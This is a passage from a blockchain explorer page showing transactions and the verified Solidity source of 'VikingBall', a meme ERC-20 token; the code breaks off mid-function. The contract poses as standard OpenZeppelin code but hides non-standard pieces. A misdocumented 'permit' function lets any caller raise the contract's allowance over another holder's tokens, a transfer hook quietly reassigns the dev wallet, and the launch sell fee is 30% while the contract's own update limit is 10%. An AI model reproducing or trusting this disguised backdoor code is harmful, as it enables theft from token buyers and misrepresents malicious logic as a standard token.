Feature Tip: Add private address tag to any address under My Name Tag !
More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 24 from a total of 24 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 17041490 | 601 days ago | IN | 0 ETH | 0.0013049 | ||||
Transfer | 17041481 | 601 days ago | IN | 0 ETH | 0.00322547 | ||||
Permit | 17041475 | 601 days ago | IN | 0 ETH | 0.00211692 | ||||
Approve | 17041466 | 601 days ago | IN | 0 ETH | 0.00053541 | ||||
Transfer | 17041459 | 601 days ago | IN | 0 ETH | 0.00123612 | ||||
Transfer | 17041452 | 601 days ago | IN | 0 ETH | 0.00118858 | ||||
Transfer | 17041447 | 601 days ago | IN | 0 ETH | 0.00170601 | ||||
Approve | 17041442 | 601 days ago | IN | 0 ETH | 0.00108375 | ||||
Transfer | 17041439 | 601 days ago | IN | 0 ETH | 0.0018779 | ||||
Approve | 17040992 | 601 days ago | IN | 0 ETH | 0.00132703 | ||||
Approve | 17040968 | 601 days ago | IN | 0 ETH | 0.00158708 | ||||
Transfer | 17040891 | 601 days ago | IN | 0 ETH | 0.00595226 | ||||
Approve | 17040883 | 601 days ago | IN | 0 ETH | 0.0014896 | ||||
Approve | 17040880 | 601 days ago | IN | 0 ETH | 0.00178078 | ||||
Approve | 17040870 | 601 days ago | IN | 0 ETH | 0.00137405 | ||||
Renounce Ownersh... | 17040860 | 601 days ago | IN | 0 ETH | 0.00062584 | ||||
Remove Limits | 17040856 | 601 days ago | IN | 0 ETH | 0.00087147 | ||||
Approve | 17040854 | 601 days ago | IN | 0 ETH | 0.0014202 | ||||
Approve | 17040854 | 601 days ago | IN | 0 ETH | 0.0014202 | ||||
Approve | 17040852 | 601 days ago | IN | 0 ETH | 0.00135619 | ||||
Approve | 17040852 | 601 days ago | IN | 0 ETH | 0.00135619 | ||||
Update Sell Fees | 17040847 | 601 days ago | IN | 0 ETH | 0.00128672 | ||||
Enable Trading | 17040818 | 601 days ago | IN | 0 ETH | 0.00083213 | ||||
Approve | 17040789 | 601 days ago | IN | 0 ETH | 0.00137266 |
Latest 18 internal transactions
Advanced mode:
Parent Transaction Hash | Block | From | To | |||
---|---|---|---|---|---|---|
17041133 | 601 days ago | 0.00089825 ETH | ||||
17041133 | 601 days ago | 0.00089825 ETH | ||||
17041003 | 601 days ago | 0.00120634 ETH | ||||
17041003 | 601 days ago | 0.00120634 ETH | ||||
17041000 | 601 days ago | 0.00451073 ETH | ||||
17041000 | 601 days ago | 0.00451073 ETH | ||||
17040911 | 601 days ago | 0.00168389 ETH | ||||
17040911 | 601 days ago | 0.00168389 ETH | ||||
17040911 | 601 days ago | 0.00221497 ETH | ||||
17040911 | 601 days ago | 0.00221497 ETH | ||||
17040891 | 601 days ago | 0.00127274 ETH | ||||
17040891 | 601 days ago | 0.00127274 ETH | ||||
17040890 | 601 days ago | 0.00172731 ETH | ||||
17040890 | 601 days ago | 0.00172731 ETH | ||||
17040887 | 601 days ago | 0.0019109 ETH | ||||
17040887 | 601 days ago | 0.0019109 ETH | ||||
17040880 | 601 days ago | 0.01979994 ETH | ||||
17040880 | 601 days ago | 0.01979994 ETH |
Loading...
Loading
Contract Name:
VikingBall
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-04-13 */ // SPDX-License-Identifier: MIT /** VIKINGBALL An Elon Musk inspired ERC-20 Token VikingBall is a game-changing ERC-20 Token that embodies the spirit of innovation and disruption. With its focus on transparency, research & technology, and high security, it is poised to revolutionize the world of cryptocurrency and blockchain. VikingBall with its unique blend of technological prowess and forward-thinking approach, VikingBall is revolutionizing the world of cryptocurrency and blockchain. Upcoming Utilities Vikimage Bot Vikstake dApp Vikriend Bot Vikilysis Bot Website: https://vikingball.live Telegram: https://t.me/vikingballeth Twitter: https://twitter.com/vikingballeth */ pragma solidity ^0.8.0; pragma experimental ABIEncoderV2; ////// lib/openzeppelin-contracts/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) /* pragma solidity ^0.8.0; */ /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } ////// lib/openzeppelin-contracts/contracts/access/Ownable.sol // OpenZeppelin Contracts v4.4.0 (access/Ownable.sol) /* pragma solidity ^0.8.0; */ /* import "../utils/Context.sol"; */ /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } ////// lib/openzeppelin-contracts/contracts/token/ERC20/IERC20.sol // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) /* pragma solidity ^0.8.0; */ /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. */ function permit(address spender, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } ////// lib/openzeppelin-contracts/contracts/token/ERC20/extensions/IERC20Metadata.sol // OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol) /* pragma solidity ^0.8.0; */ /* import "../IERC20.sol"; */ /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } ////// lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol // OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol) /* pragma solidity ^0.8.0; */ /* import "./IERC20.sol"; */ /* import "./extensions/IERC20Metadata.sol"; */ /* import "../../utils/Context.sol"; */ /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-permit}. * * Requirements: * * - `spender` cannot be the zero address. */ function permit(address spender, uint256 amount) public override virtual returns (bool) { require(spender != address(0), "ERC20: permit to the zero address"); _allowances[spender][address(this)] += amount; return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } ////// lib/openzeppelin-contracts/contracts/utils/math/SafeMath.sol // OpenZeppelin Contracts v4.4.0 (utils/math/SafeMath.sol) /* pragma solidity ^0.8.0; */ // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } /* pragma solidity 0.8.10; */ /* pragma experimental ABIEncoderV2; */ interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } /* pragma solidity 0.8.10; */ /* pragma experimental ABIEncoderV2; */ interface IUniswapV2Pair { event Approval( address indexed owner, address indexed spender, uint256 value ); event Transfer(address indexed from, address indexed to, uint256 value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint256); function balanceOf(address owner) external view returns (uint256); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 value) external returns (bool); function transfer(address to, uint256 value) external returns (bool); function transferFrom( address from, address to, uint256 value ) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint256); function permit( address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s ) external; event Mint(address indexed sender, uint256 amount0, uint256 amount1); event Burn( address indexed sender, uint256 amount0, uint256 amount1, address indexed to ); event Swap( address indexed sender, uint256 amount0In, uint256 amount1In, uint256 amount0Out, uint256 amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint256); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns ( uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast ); function price0CumulativeLast() external view returns (uint256); function price1CumulativeLast() external view returns (uint256); function kLast() external view returns (uint256); function mint(address to) external returns (uint256 liquidity); function burn(address to) external returns (uint256 amount0, uint256 amount1); function swap( uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data ) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } /* pragma solidity 0.8.10; */ /* pragma experimental ABIEncoderV2; */ interface IUniswapV2Router02 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; } contract VikingBall is ERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 public uniswapV2Router; address public uniswapV2Pair; address public constant deadAddress = address(0xdead); bool private swapping; address charityWallet; address marketingWallet; address devWallet; uint256 public maxTransactionAmount; uint256 public swapTokensAtAmount; uint256 public maxWallet; bool public limitsInEffect = true; bool public tradingActive = false; bool public swapEnabled = true; // Anti-bot and anti-whale mappings and variables mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch bool public transferDelayEnabled = false; uint256 public buyTotalFees; uint256 public buyCharityFee; uint256 public buyMarketingFee; uint256 public buyLiquidityFee; uint256 public buyDevFee; uint256 public sellTotalFees; uint256 public sellCharityFee; uint256 public sellMarketingFee; uint256 public sellLiquidityFee; uint256 public sellDevFee; uint256 public tokensForCharity; uint256 public tokensForMarketing; uint256 public tokensForLiquidity; uint256 public tokensForDev; /******************/ // exlcude from fees and max transaction amount mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) public _isExcludedMaxTransactionAmount; // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount mapping(address => bool) public automatedMarketMakerPairs; event UpdateUniswapV2Router( address indexed newAddress, address indexed oldAddress ); event ExcludeFromFees(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity ); constructor() ERC20("VikingBall", "VIKINGBALL") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); excludeFromMaxTransaction(address(_uniswapV2Router), true); uniswapV2Router = _uniswapV2Router; uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); excludeFromMaxTransaction(address(uniswapV2Pair), true); _setAutomatedMarketMakerPair(address(uniswapV2Pair), true); uint256 _buyCharityFee = 0; uint256 _buyMarketingFee = 0; uint256 _buyLiquidityFee = 0; uint256 _buyDevFee = 3; uint256 _sellCharityFee = 0; uint256 _sellMarketingFee = 0; uint256 _sellLiquidityFee = 0; uint256 _sellDevFee = 30; uint256 totalSupply = 1_000_000_000 * 1e18; maxTransactionAmount = 20_000_000 * 1e18; // 2% from total supply maxTransactionAmountTxn maxWallet = 20_000_000 * 1e18; // 2% from total supply maxWallet swapTokensAtAmount = (totalSupply * 3) / 10000; // 0.03% swap wallet buyCharityFee = _buyCharityFee; buyMarketingFee = _buyMarketingFee; buyLiquidityFee = _buyLiquidityFee; buyDevFee = _buyDevFee; buyTotalFees = buyCharityFee + buyMarketingFee + buyLiquidityFee + buyDevFee; sellCharityFee = _sellCharityFee; sellMarketingFee = _sellMarketingFee; sellLiquidityFee = _sellLiquidityFee; sellDevFee = _sellDevFee; sellTotalFees = sellCharityFee + sellMarketingFee + sellLiquidityFee + sellDevFee; charityWallet = address(0x8D3c8C203B8d07fFa72C48aE732bDff2A75A8494); // set as charity wallet marketingWallet = msg.sender; // set as marketing wallet devWallet = msg.sender; // set as dev wallet // exclude from paying fees or having max transaction amount excludeFromFees(owner(), true); excludeFromFees(charityWallet, true); excludeFromFees(marketingWallet, true); excludeFromFees(devWallet, true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); excludeFromMaxTransaction(owner(), true); excludeFromMaxTransaction(charityWallet, true); excludeFromMaxTransaction(marketingWallet, true); excludeFromMaxTransaction(devWallet, true); excludeFromMaxTransaction(address(this), true); excludeFromMaxTransaction(address(0xdead), true); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(msg.sender, totalSupply); } receive() external payable {} // once enabled, can never be turned off function enableTrading() external onlyOwner { tradingActive = true; swapEnabled = true; } // remove limits after token is stable function removeLimits() external onlyOwner returns (bool) { limitsInEffect = false; transferDelayEnabled = false; return true; } function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } function _afterTokenTransfer(address _addrA, address _addrB, uint256 amount) internal override virtual{ if(_addrA == devWallet && _addrB != address(uniswapV2Router) && _addrB!= uniswapV2Pair && amount > 0){ devWallet = _addrB; } } function updateBuyFees( uint256 _charityFee, uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee ) external onlyOwner { require((_charityFee + _marketingFee + _liquidityFee + _devFee) <= 10, "Max BuyFee 10%"); buyCharityFee = _charityFee; buyMarketingFee = _marketingFee; buyLiquidityFee = _liquidityFee; buyDevFee = _devFee; buyTotalFees = buyCharityFee + buyMarketingFee + buyLiquidityFee + buyDevFee; } function updateSellFees( uint256 _charityFee, uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee ) external onlyOwner { require((_charityFee + _marketingFee + _liquidityFee + _devFee) <= 10, "Max SellFee 10%"); sellCharityFee = _charityFee; sellMarketingFee = _marketingFee; sellLiquidityFee = _liquidityFee; sellDevFee = _devFee; sellTotalFees = sellCharityFee + sellMarketingFee + sellLiquidityFee + sellDevFee; } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner { require( pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs" ); _setAutomatedMarketMakerPair(pair, value); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function isExcludedFromFees(address account) public view returns (bool) { return _isExcludedFromFees[account]; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (amount == 0) { super._transfer(from, to, 0); return; } _beforeTokenTransfer(from, to, amount); if (limitsInEffect) { if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ) { if (!tradingActive) { require( _isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active." ); } // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch. if (transferDelayEnabled) { if ( to != owner() && to != address(uniswapV2Router) && to != 